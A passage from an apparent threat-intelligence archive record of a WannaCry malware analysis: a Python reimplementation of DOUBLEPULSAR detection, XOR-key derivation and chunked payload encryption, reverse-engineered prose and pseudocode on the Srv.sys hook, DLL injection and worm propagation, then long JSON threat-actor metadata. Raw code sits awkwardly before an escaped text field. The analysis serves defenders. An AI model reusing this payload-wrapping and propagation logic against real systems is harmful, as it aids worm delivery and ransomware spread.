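DOUBLEPULSAR_PRESENT_MID = 0x51                # ping answered by the implant
DOUBLEPULSAR_ABSENT_MID = 0x41                 # ping answered by a clean srv.sys (public analyses)
MASK32 = 0xFFFFFFFF


def parse_smb_header(response):
    # Return the SMB header fields of a raw response (NetBIOS header first).
    if len(response) < 4 + SMB_HEADER.size:
        raise ValueError('short SMB response')
    fields = SMB_HEADER.unpack_from(response, 4)
    if fields[0] != SMB_MAGIC:
        raise ValueError('not an SMB1 header')
    names = ('magic', 'command', 'nt_status', 'flags', 'flags2', 'pid_high',
             'signature', 'reserved', 'tree_id', 'process_id', 'user_id', 'multiplex_id')
    return dict(zip(names, fields))


def is_vulnerable_to_ms17_010(peeknamedpipe_response):
    # The worm compares the four status bytes 05 02 00 C0 one by one; that is
    # the little-endian encoding of STATUS_INSUFF_SERVER_RESOURCES.
    return parse_smb_header(peeknamedpipe_response)['nt_status'] == STATUS_INSUFF_SERVER_RESOURCES


def is_backdoored(trans2_session_setup_response):
    return parse_smb_header(trans2_session_setup_response)['multiplex_id'] == DOUBLEPULSAR_PRESENT_MID


def doublepulsar_xor_key(sig):
    # calculate_doublepulsar_xor_key() with every intermediate truncated to
    # 32 bits, as the unsigned int arithmetic in the worm does.
    sig &= MASK32
    hi = (((sig >> 16) | (sig & 0xFF0000)) >> 8) & MASK32
    lo = ((((sig << 16) & MASK32) | (sig & 0xFF00)) << 8) & MASK32
    return ((2 * sig) ^ (hi | lo)) & MASK32


def xor_key_from_response(trans2_session_setup_response):
    # Signature1 is the first DWORD of the 8-byte signature field, read little-endian.
    sig = struct.unpack('<I', parse_smb_header(trans2_session_setup_response)['signature'][:4])[0]
    return doublepulsar_xor_key(sig)


def xor_payload(key, buf):
    # The 4 key bytes in little-endian order, repeated; XOR is its own inverse.
    kb = struct.pack('<I', key)
    return bytes(b ^ kb[i % 4] for i, b in enumerate(buf))


def encrypt_in_chunks(key, payload, chunk=4096):
    # The DLL is shipped in 4 KB chunks; xor_payload() restarts its index at
    # 0 on every call, so each chunk is keyed independently.
    return [xor_payload(key, payload[off:off + chunk]) for off in range(0, len(payload), chunk)]


def build_response(nt_status=0, multiplex_id=0, signature=bytes(8), command=0x32):
    # Constructed test vector: a bare SMB1 header with no parameter or data words.
    hdr = SMB_HEADER.pack(SMB_MAGIC, command, nt_status, 0x98, 0xC807, 0,
                          signature, 0, 0x0800, 0xFEFF, 0x0800, multiplex_id)
    return NETBIOS_SESSION.pack(len(hdr)) + hdr


if __name__ == '__main__':
    vuln = build_response(nt_status=STATUS_INSUFF_SERVER_RESOURCES, command=0x25)
    print('MS17-010 tell-tale present:', is_vulnerable_to_ms17_010(vuln),
          'status bytes', vuln[9:13].hex())
    sig_bytes = struct.pack('<I', 0x12345678) + bytes(4)
    ping = build_response(multiplex_id=DOUBLEPULSAR_PRESENT_MID, signature=sig_bytes)
    key = xor_key_from_response(ping)
    print('implant present:', is_backdoored(ping), 'xor key 0x%08X' % key)
    data = bytes(range(256)) * 20
    chunks = encrypt_in_chunks(key, data)
    recovered = b''.join(xor_payload(key, c) for c in chunks)
    print('%d chunks, round trip ok: %s' % (len(chunks), recovered == data))
```

Because XOR with a repeating key is self-inverse, xor_payload() serves as both encrypt and decrypt: given a capture of the Trans2 ping response and the subsequent payload packets, the same three calls (parse the header, derive the key, XOR each chunk) recover the transferred DLL.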
The hash calculation function is reconstructed\r\nbelow:\r\n__int64 get_name_hash(_BYTE *arg_name)\r\n{\r\n    _BYTE *name = arg_name;\r\n    __int64 hash;\r\n    int i;\r\n    for (i = 0; ; i = (unsigned __int8)*name++ + (_DWORD)hash)\r\n    {\r\n        hash = (unsigned int)(127 * i);   // hash = 127 * (previous hash + next character)\r\n        if (!*name)\r\n            break;\r\n    }\r\n    return hash;\r\n}\r\nFor example, a hash of 3E1481DFh corresponds to PsLookupProcessByProcessId(), as explained in an article\r\nfrom Countercept.\r\nNOTE: the 32-bit version of the code is identical in its functionality to the x64 version.\r\nThe shellcode will then use the kernel’s ZwQuerySystemInformation() API to obtain the list of loaded drivers. Among\r\nthose drivers, it will be looking for a driver named Srv.sys – the driver is also found by the hash of its name.\r\nIt will then locate the Srv.sys driver’s .data section with the purpose of patching its\r\nSrvTransaction2DispatchTable – namely, placing a hook on its SrvTransactionNotImplemented() function,\r\nmaking sure that the shellcode is invoked as the hook handler, as explained by @zerosum0x0 .\r\nNext, the worm will construct a payload wrapped into a new SMB packet. For this, it will build a new DLL out of\r\nits own .data section. The internal name of the DLL is launcher.dll , and its only export is PlayGame(). The\r\nDLL is built using the worm's own file contents, and thus the DLL is constructed as a thin wrapper around the\r\nworm's own executable.\r\nThe constructed DLL will be passed to the remote host along with the shellcode to load it up, via SMB, in 4Kb\r\nchunks, each chunk encrypted with the earlier derived XOR key.\r\nWith the hook in place, when such a payload packet arrives via SMB, it will be seen by Srv.sys (an SMB\r\ndriver) as an invalid SMB request. Therefore, it will call the SrvTransactionNotImplemented() function from its own\r\ndispatch table. 
Since this function is hooked, the shellcode's DLL injection logic is invoked instead; it relies on KeInsertQueueApc()\r\nto queue a user-mode APC into a target process.\r\nAs a result, the shellcode invoked as the hook handler will allocate executable memory, extract the received DLL into\r\nit, and run it in userspace. This will lead to the execution of the ransomware on the remote host.\r\nThe newly built DLL launcher.dll delivered and executed at the host has very little functionality: when its\r\nPlayGame() export is called, it only loads up its own resource \"W/101\" , then saves and runs it under the fixed\r\nname mssecsvc.exe .\r\nSince mssecsvc.exe is extracted from the DLL resource, which in turn is built by the worm from its own body, it\r\nis equivalent to the worm executable itself.\r\nIf it turns out that the remote host is not infected with DOUBLEPULSAR, the worm will attempt to infect the host\r\nwith DOUBLEPULSAR, using the ETERNALBLUE technique explained above. 
This attempt will be\r\nrepeated up to 5 times, with a 3 second interval between the attempts.\r\nA high-level description of the worm’s logic is shown below:\r\nif (IS_VULNERABLE_TO_MS17_010(\u0026target, 445))\r\n{\r\n    i = 0;\r\n    do\r\n    {\r\n        Sleep(3000);                                  // wait for 3 seconds\r\n        if (IS_BACKDOORED(\u0026target, 1, 445))           // DoublePulsar installed?\r\n            break;                                    // then quit the loop\r\n        Sleep(3000);                                  // otherwise, wait 3 sec.\r\n        INFECT_WITH_DOUBLEPULSAR(\u0026target, 445);       // install DoublePulsar\r\n        ++i;\r\n    }\r\n    while (i \u003c 5);                                   // repeat up to 5 times\r\n}                                                     // .. until backdoored\r\nSleep(3000);                                          // wait for 3 seconds\r\nif (IS_BACKDOORED(\u0026target, 1, 445))                   // finally backdoored?\r\n    SEND_PAYLOAD_RANSOMWARE(\u0026target, 1, 445);         // send WCry as a DLL\r\nendthreadex(0, *\u0026target);                             // quit the thread\r\nAccording to this logic, if the host already has the DOUBLEPULSAR backdoor installed, the worm will send it\r\nthe ransomware payload to execute on the remote host. In turn, that instance of the ransomware will try to\r\nreplicate further.\r\nIf the DOUBLEPULSAR backdoor is not installed on the remote host, the worm will try to install it. The worm only\r\nreplicates to a host via the backdoor, and only once the backdoor is found to be installed there. Note that the final\r\nIS_BACKDOORED check sits outside the MS17-010 branch: a host that has already been patched but still carries a\r\nDOUBLEPULSAR implant from an earlier compromise will also receive the payload.\r\nSource: https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html"
	],
	"report_names": [
		"wanacrypt0r-ransomworm.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5",
			"created_at": "2022-10-25T16:07:24.561104Z",
			"updated_at": "2026-04-10T02:00:05.03343Z",
			"deleted_at": null,
			"main_name": "Shadow Brokers",
			"aliases": [],
			"source_name": "ETDA:Shadow Brokers",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "171b85f2-8f6f-46c0-92e0-c591f61ea167",
			"created_at": "2023-01-06T13:46:38.830188Z",
			"updated_at": "2026-04-10T02:00:03.114926Z",
			"deleted_at": null,
			"main_name": "The Shadow Brokers",
			"aliases": [
				"Shadow Brokers",
				"ShadowBrokers",
				"The ShadowBrokers",
				"TSB"
			],
			"source_name": "MISPGALAXY:The Shadow Brokers",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433988,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.pdf",
		"text": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.txt",
		"img": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.jpg"
	}
}